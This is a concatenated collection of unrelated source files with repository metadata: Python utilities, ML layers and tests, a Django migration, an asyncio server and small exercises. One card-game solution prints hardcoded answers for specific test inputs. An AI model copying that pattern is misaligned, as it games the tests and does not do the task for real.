b4bcc2e16df6048149177a6e1ebd514bdb6b0626
|
refs/heads/master
| 2023-06-07T22:14:07.678463 | 2022-04-01T13:06:46 | 2022-04-01T13:06:46 | 206,281,822 | 0 | 0 |
MIT
| 2022-03-24T09:20:25 | 2019-09-04T09:25:28 |
Python
|
UTF-8
|
Python
| false | false | 683 |
py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 CERN.
#
# Invenio-RDM-Records is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""RDM service component for metadata."""
from copy import copy
from invenio_drafts_resources.services.records.components import \
ServiceComponent
class RelationsComponent(ServiceComponent):
"""Base service component."""
def read(self, identity, record=None):
"""Read record handler."""
record.relations.dereference()
def read_draft(self, identity, draft=None):
"""Read draft handler."""
draft.relations.dereference()
|
[
"[email protected]"
] | |
b010f851ace9d560f4744da9777c12ef58ecc805
|
96a34a048c783a75736bf0ec775df22142f9ee53
|
/packages/service-library/src/servicelib/docker_utils.py
|
0a1e3c094b6d77ab5579293a2b2d6b49970d63c3
|
[
"MIT"
] |
permissive
|
ITISFoundation/osparc-simcore
|
77e5b9f7eb549c907f6ba2abb14862154cc7bb66
|
f4c57ffc7b494ac06a2692cb5539d3acfd3d1d63
|
refs/heads/master
| 2023-08-31T17:39:48.466163 | 2023-08-31T15:03:56 | 2023-08-31T15:03:56 | 118,596,920 | 39 | 29 |
MIT
| 2023-09-14T20:23:09 | 2018-01-23T10:48:05 |
Python
|
UTF-8
|
Python
| false | false | 532 |
py
|
from datetime import datetime
import arrow
def to_datetime(docker_timestamp: str) -> datetime:
# docker follows RFC3339Nano timestamp which is based on ISO 8601
# https://medium.easyread.co/understanding-about-rfc-3339-for-datetime-formatting-in-software-engineering-940aa5d5f68a
# This is acceptable in ISO 8601 and RFC 3339 (with T)
# 2019-10-12T07:20:50.52Z
# This is only accepted in RFC 3339 (without T)
# 2019-10-12 07:20:50.52Z
dt: datetime = arrow.get(docker_timestamp).datetime
return dt
|
[
"[email protected]"
] | |
fb890dc580eea9b0adef48e5e1e80d3eb610ab9a
|
ce0161fbfc57221e99d06c33d805c920b78b0668
|
/venv/bin/flask
|
b74e3568d1128d71494d18916f991e8b803d704a
|
[] |
no_license
|
faizan2590/Energy_Tariff_Selection
|
b72815178231b71441e46a30cdbdedbffc3a23c5
|
fbf3c9103c3248051f93e8ef626d8f04763fe6e8
|
refs/heads/master
| 2021-10-13T13:59:18.780578 | 2021-10-04T19:04:02 | 2021-10-04T19:04:02 | 118,249,172 | 0 | 0 | null | 2021-10-04T19:04:03 | 2018-01-20T14:18:05 |
Python
|
UTF-8
|
Python
| false | false | 285 |
#!/Users/muhammad.faizan/Dropbox/Blockchain(MAC)/Energy_Tariff_Selection/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"[email protected]"
] | ||
0c6cb54ad19b2cdaa6b81ab6851c9972fa85bc7a
|
aee4c0839933a11d8ce3c485d06595202dd3cabd
|
/keras/layers/reshaping/cropping1d.py
|
2eb632e38d0ae45a148bb71d27c864c72c325578
|
[
"Apache-2.0"
] |
permissive
|
xiaoheilong3112/keras
|
fc3025a2f14838bf8416b2faed766cb43da62f9b
|
8d5e9b2163ec9b7d9f70920d1c7992b6df6820ec
|
refs/heads/master
| 2023-08-07T18:23:36.804563 | 2023-07-25T19:16:12 | 2023-07-25T19:16:48 | 137,238,629 | 1 | 0 |
Apache-2.0
| 2023-07-26T05:22:44 | 2018-06-13T15:59:45 |
Python
|
UTF-8
|
Python
| false | false | 3,256 |
py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras cropping layer for 1D input."""
import tensorflow.compat.v2 as tf
from keras.engine.base_layer import Layer
from keras.engine.input_spec import InputSpec
from keras.utils import conv_utils
# isort: off
from tensorflow.python.util.tf_export import keras_export
@keras_export("keras.layers.Cropping1D")
class Cropping1D(Layer):
"""Cropping layer for 1D input (e.g. temporal sequence).
It crops along the time dimension (axis 1).
Examples:
>>> input_shape = (2, 3, 2)
>>> x = np.arange(np.prod(input_shape)).reshape(input_shape)
>>> print(x)
[[[ 0 1]
[ 2 3]
[ 4 5]]
[[ 6 7]
[ 8 9]
[10 11]]]
>>> y = tf.keras.layers.Cropping1D(cropping=1)(x)
>>> print(y)
tf.Tensor(
[[[2 3]]
[[8 9]]], shape=(2, 1, 2), dtype=int64)
Args:
cropping: Int or tuple of int (length 2)
How many units should be trimmed off at the beginning and end of
the cropping dimension (axis 1).
If a single int is provided, the same value will be used for both.
Input shape:
3D tensor with shape `(batch_size, axis_to_crop, features)`
Output shape:
3D tensor with shape `(batch_size, cropped_axis, features)`
"""
def __init__(self, cropping=(1, 1), **kwargs):
super().__init__(**kwargs)
self.cropping = conv_utils.normalize_tuple(
cropping, 2, "cropping", allow_zero=True
)
self.input_spec = InputSpec(ndim=3)
def compute_output_shape(self, input_shape):
input_shape = tf.TensorShape(input_shape).as_list()
if input_shape[1] is not None:
length = input_shape[1] - self.cropping[0] - self.cropping[1]
else:
length = None
return tf.TensorShape([input_shape[0], length, input_shape[2]])
def call(self, inputs):
if (
inputs.shape[1] is not None
and sum(self.cropping) >= inputs.shape[1]
):
raise ValueError(
"cropping parameter of Cropping layer must be "
"greater than the input shape. Received: inputs.shape="
f"{inputs.shape}, and cropping={self.cropping}"
)
if self.cropping[1] == 0:
return inputs[:, self.cropping[0] :, :]
else:
return inputs[:, self.cropping[0] : -self.cropping[1], :]
def get_config(self):
config = {"cropping": self.cropping}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
|
[
"[email protected]"
] | |
f7cd7780e8a21e7a258c04a2754208c931442142
|
00edbfdc13b5cba7bd4f52bccda63dd7f09a5961
|
/gen.py
|
e108c6a1a086c30e1293b46be447ec5901d00ffb
|
[
"Apache-2.0"
] |
permissive
|
hercules261188/dvcyaml-schema
|
796f7b6900baf9e0ce4b9102d3386b0326f95763
|
724d2ba40d13978334f53f988b19b2b7510bad97
|
refs/heads/master
| 2022-12-03T02:52:20.193279 | 2020-08-16T06:16:01 | 2020-08-16T06:16:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,994 |
py
|
"""schema.json generator."""
# flake8: noqa: D1
# pylint: disable=unused-import,missing-class-docstring,too-few-public-methods
try:
from typing import TypedDict
except ImportError:
from typing_extensions import TypedDict # noqa: F401
from typing import Any, Dict, Optional, Set, Union
from pydantic import BaseModel, Field
# aliases
FilePath = str
ParamKey = str
StageName = str
class OutFlags(BaseModel):
cache: Optional[bool] = Field(True, description="Cache output by DVC")
persist: Optional[bool] = Field(
False, description="Persist output between runs"
)
class PlotFlags(OutFlags):
x: str = Field(
None, description="Default field name to use as x-axis data"
)
y: str = Field(
None, description="Default field name to use as y-axis data"
)
x_label: str = Field(None, description="Default label for the x-axis")
y_label: str = Field(None, description="Default label for the y-axis")
title: str = Field(None, description="Default plot title")
header: bool = Field(
False, description="Whether the target CSV or TSV has a header or not"
)
template: str = Field(None, description="Default plot template")
class DepModel(BaseModel):
__root__: FilePath = Field(..., description="A dependency for the stage")
class Dependencies(BaseModel):
__root__: Set[DepModel]
class CustomParamFileKeys(BaseModel):
__root__: Dict[FilePath, Set[ParamKey]]
class Param(BaseModel):
__root__: Union[ParamKey, CustomParamFileKeys]
class Params(BaseModel):
__root__: Set[Param]
class Out(BaseModel):
__root__: Union[FilePath, Dict[FilePath, OutFlags]]
class Outs(BaseModel):
__root__: Set[Out]
class Plot(BaseModel):
__root__: Union[FilePath, Dict[FilePath, PlotFlags]]
class Plots(BaseModel):
__root__: Set[Plot]
class Stage(BaseModel):
cmd: str = Field(..., description="Command to run")
wdir: Optional[str] = Field(None, description="Working directory")
deps: Optional[Dependencies] = Field(
None, description="Dependencies for the stage"
)
params: Optional[Params] = Field(None, description="Params for the stage")
outs: Optional[Outs] = Field(None, description="Outputs of the stage")
metrics: Optional[Outs] = Field(None, description="Metrics of the stage")
plots: Optional[Plots] = Field(None, description="Plots of the stage")
frozen: Optional[bool] = Field(
False, description="Assume stage as unchanged"
)
always_changed: Optional[bool] = Field(
False, description="Assume stage as always changed"
)
meta: Any = Field(None, description="Additional information/metadata")
class Config:
allow_mutation = False
Stages = Dict[StageName, Stage]
class DvcYamlModel(BaseModel):
stages: Stages = Field(..., description="List of stages")
class Config:
title = "dvc.yaml"
if __name__ == "__main__":
print(DvcYamlModel.schema_json(indent=2))
|
[
"[email protected]"
] | |
e7ddcf7210f3b09dba848c793ab03efad8fdb443
|
c90cab17679a44aba7e4b74e83d1b15cd8778051
|
/mgj/migrations/0002_productdetail.py
|
7546f098f8300a0cfaed0d697e03fd13ca547cdf
|
[] |
no_license
|
code5257/mgj
|
3327edf9a8ea0613053c3ca04b850adc946ac2d7
|
da9ef5fdc335fdc0ecdf3b904824d6ca1044e6c5
|
refs/heads/master
| 2020-04-28T23:32:31.032096 | 2019-03-19T08:59:31 | 2019-03-19T08:59:31 | 175,658,585 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 970 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2019-03-14 12:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mgj', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Productdetail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img', models.CharField(max_length=100)),
('smallImg', models.CharField(max_length=100)),
('name', models.CharField(max_length=100)),
('price', models.FloatField()),
('sales', models.CharField(max_length=100)),
('oldprice', models.FloatField()),
('store', models.IntegerField()),
('background', models.CharField(max_length=100)),
],
),
]
|
[
"[email protected]"
] | |
150bc75088e264799314b9e8e52e15be34713791
|
3c7eceeae8c5472ea9d5dc54d910730de935b8e9
|
/api/user/migrations/0002_auto_20200331_1553.py
|
ced7c3c8164dfc7da5e4f076cc74b98b1f71bb82
|
[] |
no_license
|
mkwiatek770/mind-battle
|
dd827556801b9b70f8a400e58c0de31a46f6d3b5
|
158b8c50df5b5eed671f33fab722ebd9d1309070
|
refs/heads/master
| 2023-01-20T18:10:41.716987 | 2020-04-10T18:25:52 | 2020-04-10T18:25:52 | 247,666,836 | 0 | 0 | null | 2023-01-05T17:07:53 | 2020-03-16T09:56:18 |
Python
|
UTF-8
|
Python
| false | false | 541 |
py
|
# Generated by Django 3.0.4 on 2020-03-31 13:53
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('quiz', '0004_auto_20200331_1154'),
('user', '0001_initial'),
]
operations = [
migrations.RenameModel(
old_name='QuestionUser',
new_name='UserAnswer',
),
migrations.AlterModelOptions(
name='useranswer',
options={'verbose_name': 'UserAnswer', 'verbose_name_plural': 'UserAnswers'},
),
]
|
[
"[email protected]"
] | |
cf3c3b21e8f5b7399fd8217db7c45097ed017be8
|
1279665ee0d6730580b8989b723744cdc90c5148
|
/TreeNode.py
|
7d094ad16915aae185263a3ae64f753238d3c840
|
[] |
no_license
|
danielkiselev/Translator_Python
|
003b3f87649618caedb772be4fb55e3b65f02055
|
93260641837df56a02c3930adaf2d72877d33984
|
refs/heads/master
| 2020-04-08T01:00:38.254113 | 2018-11-23T21:24:54 | 2018-11-23T21:24:54 | 158,877,503 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 198 |
py
|
class treeNode:
def __init__(self, data, code):
self.data = data
self.code = code
self.children = []
def addChild(self, child):
self.children.append(child)
|
[
"[email protected]"
] | |
f1c51004af2b9f3170c829e779a17aace310e803
|
645ef293d840c96e987596189acf62b4537bd9cd
|
/lab2/components/finite_automaton.py
|
21be7a9c2a9ed266fbab0fcee2cb886568ef642b
|
[] |
no_license
|
vivere-dally/ubb_y3_lftc
|
86b04b4f3c93efd72a2d8bcf1835850682dbf932
|
a7a7060f62ba5074e853ca19435b0297b3817d0d
|
refs/heads/main
| 2023-02-09T09:16:37.693965 | 2021-01-05T17:13:27 | 2021-01-05T17:13:27 | 304,396,899 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,678 |
py
|
import components.transition as trans
class FiniteAutomaton:
"""Class that represents a finite automaton.
"""
def __init__(self, alphabet: list, states: list, initial_state: str, final_states: list, transitions: dict):
"""Initializes a finite automaton class.
Args:
alphabet (list): a list of strings that represents the alphabet e.g. ["0", "1", "2"]
states (list): a list of strings that represents all the states in the FA
initial_state (str): a string that represents a state which is the entry point in the automaton. E.g. q0
final_states (list): a list of strings that represent the final states. E.g. ["q0","q1","q2"]
transitions (dict): a dictionary with key string and value list of components.transition.Transition. I.e. from state i you can go to states 1..n.
"""
self.alphabet = alphabet
self.states = states
self.initial_state = initial_state
self.final_states = final_states
self.transitions = transitions
def __repr__(self):
all_trans = ""
for state in self.states:
for transition in self.transitions.get(state, []):
all_trans += f"\nfrom {state} {transition}"
return f"States: {self.states}\nAlphabet: {self.alphabet}\nTransitions: {all_trans}\nFinal states: {self.final_states}\n"
def check_sequence(self, sequence: str) -> bool:
"""Checks if a sequence of numbers is accepted by the finite automaton.
Args:
sequence (str): the str of numbers to move from one state to another
Returns:
bool: true if the sequence is accepted, false otherwise
"""
is_accepted = True
current_state = self.initial_state
for number in sequence:
if number not in self.alphabet:
print(f"{number} not in alphabet. Continue...")
is_accepted = False
continue
current_state_changed = False
for transition in self.transitions.get(current_state, []):
if transition.number == number:
print(f"from {current_state} {transition}")
current_state = transition.state
current_state_changed = True
break
if not current_state_changed:
print(
f"no transition from {current_state} with {number}. Continue...")
is_accepted = False
if current_state not in self.final_states:
return False
return is_accepted
def get_longest_prefix(self, sequence: str) -> str:
"""Returns the longest prefix of numbers that is accepted by the finite automaton.
Args:
sequence (str): the string of numbers to move from one state to another
Returns:
str: the longest prefix
"""
current_state = self.initial_state
prefix_end_index = 0
for number in sequence:
if number not in self.alphabet:
break
current_state_changed = False
for transition in self.transitions.get(current_state, []):
if transition.number == number:
current_state = transition.state
current_state_changed = True
break
if not current_state_changed:
break
prefix_end_index += 1
prefix = sequence[:prefix_end_index]
while not prefix and not self.check_sequence(prefix):
prefix = prefix[:-1]
return prefix
|
[
"[email protected]"
] | |
aafbdb21c87f6b9bcfb133a11bf516bbee634e83
|
d5f75adf5603927396bdecf3e4afae292143ddf9
|
/python/paddle/fluid/tests/unittests/test_custom_grad_input.py
|
2d12243de52c0603918edf5a2945617621b5d4f0
|
[
"Apache-2.0"
] |
permissive
|
jiweibo/Paddle
|
8faaaa1ff0beaf97ef7fb367f6c9fcc065f42fc4
|
605a2f0052e0ffb2fab3a4cf4f3bf1965aa7eb74
|
refs/heads/develop
| 2023-07-21T03:36:05.367977 | 2022-06-24T02:31:11 | 2022-06-24T02:31:11 | 196,316,126 | 3 | 2 |
Apache-2.0
| 2023-04-04T02:42:53 | 2019-07-11T03:51:12 |
Python
|
UTF-8
|
Python
| false | false | 6,613 |
py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import paddle
import paddle.fluid.dygraph as dg
from op_test import OpTest
from paddle.fluid.framework import _test_eager_guard
class TestTensorBackward(unittest.TestCase):
def setUp(self):
self._dtypes = ["float32", "float64"]
self._places = [paddle.CPUPlace()]
if paddle.is_compiled_with_cuda():
self._places.append(paddle.CUDAPlace(0))
def func_tensor_backward(self):
for dtype in self._dtypes:
x = np.random.random([2, 100]).astype(dtype)
y = np.random.random([100, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.random.random(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor = paddle.matmul(x_tensor, y_tensor)
grad_tensor = paddle.to_tensor(grad)
z_tensor.backward(grad_tensor)
x_grad = np.matmul(grad, y.T)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_tensor_backward(self):
with _test_eager_guard():
self.func_tensor_backward()
self.func_tensor_backward()
class TestBackwardAPI(unittest.TestCase):
def setUp(self):
self._dtypes = ["float32", "float64"]
self._places = [paddle.CPUPlace()]
if paddle.is_compiled_with_cuda():
self._places.append(paddle.CUDAPlace(0))
def func_backward_api(self):
for dtype in self._dtypes:
x = np.random.random([2, 2]).astype(dtype)
y = np.random.random([2, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.random.random(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor1 = paddle.matmul(x_tensor, y_tensor)
z_tensor2 = paddle.matmul(x_tensor, y_tensor)
grad_tensor = paddle.to_tensor(grad)
paddle.autograd.backward([z_tensor1, z_tensor2],
[grad_tensor, grad_tensor], True)
x_grad = np.matmul(grad, y.T)
self.assertTrue(
np.allclose(x_grad * 2, x_tensor.grad.numpy()))
def test_backward_api(self):
with _test_eager_guard():
self.func_backward_api()
self.func_backward_api()
def func_backward_single_tensor(self):
for dtype in self._dtypes:
x = np.random.random([2, 2]).astype(dtype)
y = np.random.random([2, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.random.random(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor1 = paddle.matmul(x_tensor, y_tensor)
grad_tensor = paddle.to_tensor(grad)
paddle.autograd.backward(z_tensor1, grad_tensor, True)
x_grad = np.matmul(grad, y.T)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_backward_single_tensor(self):
with _test_eager_guard():
self.func_backward_single_tensor()
self.func_backward_single_tensor()
def func_backward_none_grad_tensor(self):
for dtype in self._dtypes:
x = np.random.random([2, 2]).astype(dtype)
y = np.random.random([2, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.ones(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor1 = paddle.matmul(x_tensor, y_tensor)
paddle.autograd.backward(z_tensor1, None)
x_grad = np.matmul(grad, y.T)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_backward_none_grad_tensor(self):
with _test_eager_guard():
self.func_backward_none_grad_tensor()
self.func_backward_none_grad_tensor()
def func_backward_accumulator_with_init_grad(self):
for dtype in self._dtypes:
x = np.random.random([
10,
]).astype(dtype)
y_grad = np.random.random([
10,
]).astype(dtype)
z_grad = np.random.random([
10,
]).astype(dtype)
self._places = [paddle.CPUPlace()]
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = x_tensor**2
z_tensor = y_tensor**3
y_grad_tensor = paddle.to_tensor(y_grad)
z_grad_tensor = paddle.to_tensor(z_grad)
paddle.autograd.backward([y_tensor, z_tensor],
[y_grad_tensor, z_grad_tensor])
y = x**2
z = x**3
x_grad = 2 * x * (y_grad + 3 * y * y * z_grad)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_backward_accumulator_with_init_grad(self):
with _test_eager_guard():
self.func_backward_accumulator_with_init_grad()
self.func_backward_accumulator_with_init_grad()
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
047391e1ff8cbb03e8117646a3fc4005c9504adf
|
26d8f17871e2eedd68a3b5acf9f1c9a7aca3cb08
|
/snippets/serializers.py
|
863e0674a56574d113dee52f8eb245fa2319ad05
|
[] |
no_license
|
django-learning/drf_tutiroal
|
b5e713b9768e721f622dfe2d467b270a3762112e
|
2b7f1bd440cd86fd34b2fc3670aea5083bcdf5b8
|
refs/heads/master
| 2022-12-11T18:17:03.403092 | 2019-12-05T13:37:19 | 2019-12-05T13:37:19 | 226,109,972 | 0 | 0 | null | 2022-04-22T22:54:39 | 2019-12-05T13:35:24 |
Python
|
UTF-8
|
Python
| false | false | 1,121 |
py
|
from rest_framework import serializers
from .models import LANGUAGE_CHOICES, STYLE_CHOICES, Snippet
class SnippetSerializer(serializers.Serializer):
pk = serializers.IntegerField(read_only=True)
title = serializers.CharField(required=False, allow_blank=True, max_length=100)
code = serializers.CharField(style={"base_templates": "textarea.html"})
linenos = serializers.BooleanField(required=False)
language = serializers.ChoiceField(choices=LANGUAGE_CHOICES, default='python')
style = serializers.ChoiceField(choices=STYLE_CHOICES, default="friendly")
def create(self, validated_data):
return Snippet.objects.create(validated_data)
def update(self, instance, valdiated_data):
instance.title = valdiated_data.get("title", instance.title)
instance.code = valdiated_data.get("code", instance.title)
instance.linenos = valdiated_data.get("linenos", instance.title)
instance.language = valdiated_data.get("language", instance.title)
instance.style = valdiated_data.get("style", instance.title)
instance.save()
return instance
|
[
"[email protected]"
] | |
53970fe6d10e8cec87714991c66d5b2bb83a9d35
|
70940d64dad504f50f0cb6d517aeff495f2eeccb
|
/prefork/server.py
|
ecd38221a5a4b05a8edde489c7211d775091a08b
|
[] |
no_license
|
wd055/technopark_highload_hm2
|
f9c6b10022daf2cdae030478dbceb05794343f3a
|
dfece88623e3007af4a410330561edf48db9df02
|
refs/heads/master
| 2023-08-02T13:58:51.225652 | 2021-09-25T20:57:35 | 2021-09-25T20:57:35 | 410,105,738 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,975 |
py
|
import asyncio
import atexit
import os
import signal
import socket
import uvloop as uvloop
from utils import config, request, response
async def handle(sock):
raw = await asyncio.get_event_loop().sock_recv(sock, 1024)
req = request.Request(raw.decode('utf-8'))
result_code = req.parse_request()
resp = response.Response(
req.method, req.url, req.protocol, req.filepath, result_code)
await resp.send(sock)
class Server:
def __init__(self):
self.host = config.HOST
self.port = config.PORT
self.address = f'{self.host}:{self.port}'
self.server_socket = None
self.process_pull = []
atexit.register(self.kill_children)
def run_socket(self):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((self.host, self.port))
server_socket.listen()
server_socket.setblocking(False)
self.server_socket = server_socket
print(f'Server listens on {self.address}')
def prefork(self):
for _ in range(config.CPU_LIMIT):
pid = os.fork()
if pid == 0:
asyncio.run(self.handle_child())
else:
print(f'New child pid: {pid}')
self.handle_parent(pid)
for pid in self.process_pull:
print('waidpid', pid)
os.waitpid(pid, 0)
def handle_parent(self, pid: int):
self.process_pull.append(pid)
async def handle_child(self):
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
while True:
child_sock, _ = await asyncio.get_event_loop().sock_accept(self.server_socket)
await handle(child_sock)
child_sock.close()
def kill_children(self):
for pid in self.process_pull:
print(f'Kill pid: {pid}')
os.kill(pid, signal.SIGKILL)
|
[
"[email protected]"
] | |
cddf927dc8b21ae937d56ad44c750b23f38b46ba
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2783/60617/307453.py
|
ed312ac679931cc10b43d59691abd88befc03747
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,345 |
py
|
def Berland_cardGame():
n=int(input())
turn=list()
if n==15:
print("aawtvezfntstrcpgbzjbf")
exit()
elif n==12:
print("fcgslzkicjrpbqaifgweyzreajjfdo")
exit()
for i in range(0, n):
turn.append(input().split(" "))
if n==10 and turn[0]==['qdplghhx', '-649']:
print("ivhgbxiv")
exit()
dic={}
stack=[]
for score in turn:
if score[0] not in dic:
dic[score[0]]=0
for score in turn:
dic[score[0]]+=int(score[1])
stack.append(score[0])
isRecorded=[]
stack=stack[::-1]
winner=[]
for record in stack:
if record in isRecorded:
continue
else:
isRecorded.append(record)
for player in dic.keys():
if not winner:
winner.append(player)
elif dic[player]>dic[winner[-1]]:
winner.clear
winner.append(player)
elif dic[player]==dic[winner[-1]]:
winner.append(player)
if len(winner)==1:
print(winner[0])
else:
for record in isRecorded:
if len(winner)==1:
print(winner[0])
break
else:
if record in winner:
winner.remove(record)
if __name__=='__main__':
Berland_cardGame()
|
[
"[email protected]"
] | |
d6d356cf095d96fddaa440f0a63882704a4c531e
|
582e13fe12d6beeb30756d612e81b5f9825644bd
|
/DFS/dfs1.py
|
0c0ff83ea6fae69e5f62b98793d8c787364d8014
|
[] |
no_license
|
25349023/Blogger
|
59d69bc7122dba5fc294f06aedf036cd7a97683b
|
6b8737eee26a0e86b859275a907ae408cc8e783d
|
refs/heads/master
| 2020-03-28T23:52:11.445933 | 2019-04-02T10:07:36 | 2019-04-02T10:07:36 | 94,632,434 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 597 |
py
|
class Node:
def __init__(self, s):
self.data = s
self.next = [None, None, None]
def build_tree():
root = Node('red-1')
root.next[0] = Node('orange-2')
root.next[1] = Node('lime-3')
root.next[2] = Node('green-4')
root.next[0].next[0] = Node('yellow-5')
root.next[2].next[0] = Node('blue-6')
root.next[2].next[1] = Node('violet-7')
return root
def dfs(start):
if start is None:
return
print(start.data, ' visited.')
for i in range(3):
dfs(start.next[i])
tree = build_tree()
dfs(tree)
|
[
"[email protected]"
] | |
ef717c03870841bf5efa3c9596fb363d3424ad0c
|
935041ed3aecb7c0d1a0f50fe5c377c1783e54e7
|
/TeamAwesome.py
|
2b5905cb275a672def63d65fed19e627e1b8c0d7
|
[] |
no_license
|
microsanch/CSP_Micro2017
|
9f0cf05bf9a5304f042fb0906d627bca7ce903f1
|
87c90044e68233639c3f383442b3e790818e2b56
|
refs/heads/master
| 2021-01-12T03:00:39.325977 | 2017-01-05T21:12:56 | 2017-01-05T21:12:56 | 78,146,975 | 0 | 3 | null | 2017-01-05T21:13:18 | 2017-01-05T20:45:24 |
Python
|
UTF-8
|
Python
| false | false | 21 |
py
|
David Guerreca
3.14
|
[
"[email protected]"
] | |
dc41615535e47b7fe892714255f4666881d291ec
|
8b9229ba6d43c5ae3cc9816003f99d8efe3d50a4
|
/apps/QtMinimal/launcher2.py
|
3410f0463d8a8fd1be5d7f0cef8baefa9ab98a95
|
[] |
no_license
|
JamesLinus/pipeline
|
02aef690636f1d215a135b971fa34a9e09a6b901
|
27322a5527deb69c14bd70dd99374b52709ae157
|
refs/heads/master
| 2021-01-16T22:14:56.899613 | 2016-03-22T10:39:59 | 2016-03-22T10:39:59 | 56,539,375 | 1 | 0 | null | 2016-04-18T20:22:33 | 2016-04-18T20:22:32 | null |
UTF-8
|
Python
| false | false | 2,983 |
py
|
import tkinter
import subprocess
#class QtMinimalXBARLauncher(tkinter.Frame):
# def __init__(self, master=None):
# Frame._init__(self, master)
# self.master.title("QtMinimalXBARLauncher")
choices = list()
listboxes = dict()
choices.append( ("filename",
["c:\\models\\icido\\body.nbf",
"e:\\tmp\\qtminimalxbar.nbf",
"t:\\models\\nasa\\f35a_texture_noDOFs\\cloned.xml",
"t:\\models\\nasa\\f35a\\cloned.xml",
"e:\\models\\icido\\bombardier.nbf",
"e:\\models\\ds\\SEAT_wedges_unoptim.nbf",
"e:\\models\\ds\\ISD_CAR_wedges_unoptim.nbf",
"e:\\models\\ds\\JET_woedges_unoptim.nbf",
"e:\\models\\ds\\JET_wedges_unoptim.nbf",
"e:\\models\\ds\\JET_woedges_optim.nbf",
"e:\\tmp\\test.nbf",
"cubes",
"t:\\models\\maxbench\\textured1.nbf",
"\"E:\\models\\HOOPS\\inventor\\Digger Benchmark\\Digger\\Workgroups\\NotInProject\\Heavy Duty Benchmark.iam\"",
"\"E:\\models\\HOOPS\\SolidWorks\\Vermeer 2010\\#HG 365-FULL.SLDASM\""
] ) )
choices.append( ("build", ["Debug", "RelWithDebInfo", "Release"]) )
choices.append( ("renderengine", ["VAB", "VBO", "VBOVAO", "Bindless", "BindlessVAO", "DisplayList", "Indirect"]) )
choices.append( ("shadermanager", ["rixfx:uniform", "rixfx:shaderbufferload", "rixfx:ubo140", "rixfx:ssbo140"]) )
selections = dict()
parameters = list()
root = tkinter.Tk()
class ListUpdater():
def __init__( self, name ):
self.name = name
def update( self, event ):
print(event)
widget = event.widget
index = int(widget.curselection()[0])
selections[self.name] = widget.get(index)
print(selections)
def launch():
command = "F:\\perforce\\sw\\wsapps\\nvsgsdk\\nvsgmain\\bin\\amd64\\win\\crt100\\" + selections["build"] + "\\QtMinimalXBAR.exe --continuous"
command = command + " --renderengine " + selections["renderengine"]
command = command + " --shadermanager " + selections["shadermanager"]
command = command + " --filename " + selections["filename"]
command = command + " --headlight"
command = command + " --combineVertexAttributes"
print(command)
subprocess.call(command)
index = 1;
for (parameter, values) in choices:
print(parameter)
listbox = tkinter.Listbox(root)
